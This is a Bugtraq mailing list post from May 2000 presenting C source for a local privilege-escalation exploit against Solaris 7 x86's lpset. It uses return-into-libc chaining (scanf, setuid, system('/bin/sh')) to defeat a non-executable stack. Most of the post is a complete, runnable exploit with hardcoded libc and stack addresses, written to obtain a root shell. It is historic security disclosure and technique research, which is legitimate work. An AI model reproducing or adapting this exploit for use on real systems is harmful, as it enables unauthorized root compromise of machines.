Bugtraq mailing list archives
non-exec stack
From: newsham () LAVA NET (Tim Newsham)
Date: Sat, 6 May 2000 17:06:28 -1000
Here's an overflow exploit that works on a non-exec stack on x86 boxes. It demonstrates how it is possible to thread together several libc calls. I have not seen any other exploits for x86 that have done this. For the lpset bug in sol7 x86.

Tim N.

#include <string.h>
#include <unistd.h>

/* libc load address and stack location on the target (Solaris 7 x86) */
#define BASE    0xdff40000
#define STACK   0x8047e30
#define BUFSIZE 36

/* libc functions and strings reached through the libc base */
#define SYSTEM  (BASE + 0x5b328)
#define SCANF   (BASE + 0x5ae80)
#define SETUID  (BASE + 0x30873)
#define PERCD   (BASE + 0x83754)
#define BINSH   (BASE + 0x83654)

/* return points inside libc that discard 3, 2 or 1 words of arguments */
#define POP3    (SYSTEM + 610)
#define POP2    (SYSTEM + 611)
#define POP1    (SYSTEM + 612)

int main(void)
{
    unsigned char expbuf[1024];
    char *env[1];
    unsigned int *p;

    /* padding up to the saved return address */
    memset(expbuf, 'a', BUFSIZE);
    p = (unsigned int *)(expbuf + BUFSIZE);

    /* chained libc frames: scanf, then setuid, then system */
    *p++ = STACK;
    *p++ = SCANF + 1;
    *p++ = STACK + 6 * 4;
    *p++ = POP2;
    *p++ = PERCD;
    *p++ = STACK + 9 * 4;
    *p++ = STACK + 10 * 4;
    *p++ = SETUID;
    *p++ = POP1;
    *p++ = 0x33333333;
    *p++ = STACK + 15 * 4;
    *p++ = SYSTEM;
    *p++ = 0x33333333;
    *p++ = BINSH;
    *p = 0;

    env[0] = 0;
    execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123",
           (char *)0, env);
    return 0;
}